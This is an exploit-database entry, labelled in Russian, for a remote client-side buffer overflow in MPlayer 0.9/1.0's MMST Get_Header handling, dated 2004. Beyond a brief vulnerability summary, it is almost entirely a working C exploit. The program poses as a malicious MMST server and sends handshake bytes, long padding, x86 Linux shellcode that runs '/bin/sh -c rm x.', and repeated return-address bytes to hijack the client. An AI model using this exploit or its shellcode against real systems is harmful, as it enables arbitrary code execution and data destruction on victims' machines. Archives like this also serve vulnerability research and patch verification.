Exploit MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow

[Exploiter]

EDB-ID

24853

Проверка EDB

1. Пройдено

Автор

ARIEL BERKMAN

Тип уязвимости

REMOTE

Платформа

LINUX

CVE

N/A

Дата публикации

2004-12-15

MPlayer 0.9/1.0 - MMST Get_Header Remote Client-Side Buffer Overflow

// source: https://www.securityfocus.com/bid/11962/info

A remote, client-side buffer overflow vulnerability reportedly affects MPlayer. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

char payload[] = {
 0xeb ,0x47
 ,0x59
 ,0x89 ,0xca
 ,0x83 ,0xc2 ,0x18
 ,0x89 ,0x11
 ,0x31 ,0xc0
 ,0x89 ,0x41 ,0x04
 ,0x83 ,0xc2 ,0x13
 ,0x89 ,0x51 ,0x08
 ,0x83 ,0xc2 ,0x08
 ,0x89 ,0x51 ,0x0c
 ,0x83 ,0xc2 ,0x03
 ,0x89 ,0x51 ,0x10
 ,0x89 ,0x41 ,0x14
 ,0x88 ,0x41 ,0x2a
 ,0x88 ,0x41 ,0x32
 ,0x88 ,0x41 ,0x35
 ,0x88 ,0x41 ,0x3a
 ,0x51
 ,0x83 ,0xc1 ,0x08
 ,0x51
 ,0x83 ,0xc1 ,0x20
 ,0x83 ,0xc1 ,0x03
 ,0x51
 ,0x83 ,0xc0 ,0x3b
 ,0x50
 ,0xcd ,0x80
 ,0x31 ,0xc0
 ,0x50
 ,0x40
 ,0x50
 ,0xcd ,0x80
 ,0xe8 ,0xb4 ,0xff ,0xff ,0xff
 ,0x61 ,0x62 ,0x63 ,0x64 ,0x65 ,0x66
 ,0x67 ,0x68 ,0x69 ,0x6a ,0x6b ,0x6c
 ,0x6d ,0x6e ,0x6f ,0x70 ,0x71 ,0x72
 ,0x73 ,0x74 ,0x75 ,0x76 ,0x77 ,0x78
 ,0x50 ,0x41 ,0x54 ,0x48 ,0x3d ,0x2f
 ,0x62 ,0x69 ,0x6e ,0x3a ,0x2f ,0x75
 ,0x73 ,0x72 ,0x2f ,0x62 ,0x69 ,0x6e
 ,0x20 ,0x2f ,0x62 ,0x69 ,0x6e ,0x2f
 ,0x73 ,0x68 ,0x20 ,0x2d ,0x63 ,0x20
 ,0x72 ,0x6d ,0x20 ,0x78 ,0x2e
} ;

#include <stdio.h>

main()
{

char buf[256];
int len;
int s,i;
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
 
printf("hello\n");
fflush(stdout);   
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
fflush(stdout);
 
len=recv(0,buf,256,0);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
putchar(0x03);
for (i=0;i<50000;i++) 
        putchar('A');
for (i=0;i<sizeof payload;i++)
        putchar (payload[i]);

printf("123");
for (i=0;i<20000;i++)           // RA all the way....
{
        putchar(0x01);
        putchar(0x15);
        putchar(0xbb);
        putchar(0xbf);
}
fflush(stdout);
}